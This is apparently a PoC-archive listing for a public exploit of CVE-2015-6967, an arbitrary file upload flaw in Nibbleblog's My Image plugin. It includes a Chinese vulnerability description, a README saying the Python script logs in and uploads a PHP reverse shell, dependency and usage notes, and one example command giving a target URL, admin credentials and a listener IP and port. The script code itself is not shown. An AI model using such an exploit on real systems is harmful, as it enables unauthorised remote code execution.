Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2015-6967 PoC — Nibbleblog 代码注入漏洞

Source
Associated Vulnerability
Title:Nibbleblog 代码注入漏洞 (CVE-2015-6967)
Description:NibbleBlog是一套博客引擎。 Nibbleblog 4.0.5之前版本的My Image插件中存在任意文件上传漏洞。远程攻击者可通过上传可执行文件,并发送直接的请求访问该文件利用该漏洞执行任意代码。
Description
CVE-2015-6967 PoC Exploit
Readme
# CVE-2015-6967-EXPLOIT
CVE-2015-6967 PoC Exploit


This Python script exploits a vulnerability in **Nibbleblog** (CVE-2015-6967) to upload a reverse shell on a vulnerable target. The script takes user input for the target URL, user credentials, and your host IP/port, and then proceeds to exploit the vulnerability by uploading a PHP reverse shell.

## Disclaimer

This script is intended for educational purposes only. Do **NOT** use it for illegal activities. Always get explicit permission before testing or exploiting any vulnerabilities on systems that you do not own or have authorization to access.

## Requirements

- Python 3.x
- `requests` library
- `argparse` library
- `colorama` library
- `pyfiglet` library

You can install the required dependencies using the following command:

```
pip install requests colorama pyfiglet
```
Usage

The script requires several parameters to run:
url: Target Nibbleblog URL (e.g., http://10.10.14.14/nibbleblog)
-U, --user: Username for Nibbleblog admin
-P, --password: Password for Nibbleblog admin
-p, --host-port: Your local port for the reverse shell to connect to
-H, --host-ip: Your local IP address for the reverse shell to connect to

Example
`python exploit.py http://10.10.14.14/nibbleblog -U admin -P password123 -p 4444 -H 192.168.1.100`
File Snapshot

[4.0K] /data/pocs/19cacb297db8a65facdb67a7366546fcf66ec354 ├── [5.9K] CVE-2015-6967.py └── [1.3K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.